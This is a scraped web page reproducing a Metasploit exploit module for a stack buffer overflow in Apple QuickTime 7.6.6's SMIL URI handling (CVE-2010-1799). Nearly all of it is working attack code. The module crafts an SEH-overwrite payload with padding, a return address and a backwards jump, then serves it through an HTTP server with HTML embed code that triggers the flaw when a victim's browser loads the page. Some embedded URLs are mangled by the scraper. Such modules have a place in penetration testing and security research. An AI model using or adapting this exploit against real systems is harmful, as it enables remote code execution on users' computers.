扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 |
## # $Id: apple_quicktime_smil_debug.rb 11513 2011-01-08 00:25:44Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # needs more testing/targets to be Great include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Seh include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name=> OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test=> nil, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow', 'Description'=> %q{ This module exploits a buffer overflow in Apple QuickTime 7.6.6. When processing a malformed SMIL uri, a stack-based buffer overflow can occur when logging an error message. }, 'Author' => [ 'Krystian Kloskowski',# original discovery 'jduck' # Metasploit module ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 11513 $', 'References' => [ [ 'CVE', '2010-1799' ], [ 'OSVDB', '66636'], [ 'BID', '41962' ], [ 'URL', 'http://secunia.com/advisories/40729/' ], [ 'URL', 'http://support.apple.com/kb/HT4290' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload'=> { 'Space'=> 640, # 716 - 63 - 8 - 5 'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c", }, 'Platform' => 'win', 'Targets'=> [ #[ 'Automatic', { } ], [ 'Apple QuickTime Player 7.6.6', { 'Ret' => 0x66801042 # p/p/r from QuickTime.qts (v7.66.71.0) } ], ], 'Privileged' => false, 'DisclosureDate' => 'Aug 12 2010', 'DefaultTarget'=> 0)) end def on_request_uri(client, request) return if ((p = regenerate_payload(client)) == nil) if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/) print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...") print_status("Trying target #{target.name}...") # This is all basically filler on the browser target because we can't # expect the SEH to be in a reliable place across multiple browsers. # Heap spray ftw. off = 716 start = "cHTTPDhlr_SetURL - url doesn't start with http:// or http1:// '" scheme = rand_text_alphanumeric(5) sploit = '' sploit << scheme sploit << "://" # payload sploit << p.encoded # pad to SEH sploit << rand_text_english(off - sploit.length - start.length) # seh frame sploit << generate_seh_record(target.ret) # jmp back to payload distance = off + 8 - (8 + start.length) sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string # force exception while writing sploit << rand_text(1024) * 15 smil = %Q|<smil xmlns="http://www.w3.org/2001/SMIL20/Language"> <body> <img src="https://www.exploit-db.com/exploits/16558/#{sploit}" /> </body> </smil> | send_response(client, smil, { 'Content-Type' => "application/smil" }) else print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...") shellcode = Rex::Text.to_unescape(p.encoded) url =((datastore['SSL']) ? "https://" : "http://") url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST']) url << ":" + datastore['SRVPORT'] url << get_resource fname = rand_text_alphanumeric(4) content ="<html><body>" content << <<-ENDEMBED <OBJECT CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" WIDTH="1" HEIGHT="1" CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"> <PARAM name="SRC"VALUE = "#{url}/#{fname}.smil"> <PARAM name="QTSRC"VALUE = "#{url}/#{fname}.smil"> <PARAM name="AUTOPLAY" VALUE = "true" > <PARAM name="TYPE" VALUE = "video/quicktime"> <PARAM name="TARGET" VALUE = "myself" > <EMBED SRC= "https://www.exploit-db.com/exploits/16558/#{url}/#{fname}.qtl" QTSRC= "#{url}/#{fname}.qtl" TARGET = "myself" WIDTH= "1" HEIGHT = "1" AUTOPLAY = "true" PLUGIN = "quicktimeplugin" TYPE = "video/quicktime" CACHE= "false" PLUGINSPAGE= "http://www.apple.com/quicktime/download/" > </EMBED> </OBJECT> ENDEMBED content << "</body></html>" send_response(client, content, { 'Content-Type' => "text/html" }) end # Handle the payload handler(client) end end |
体验盒子
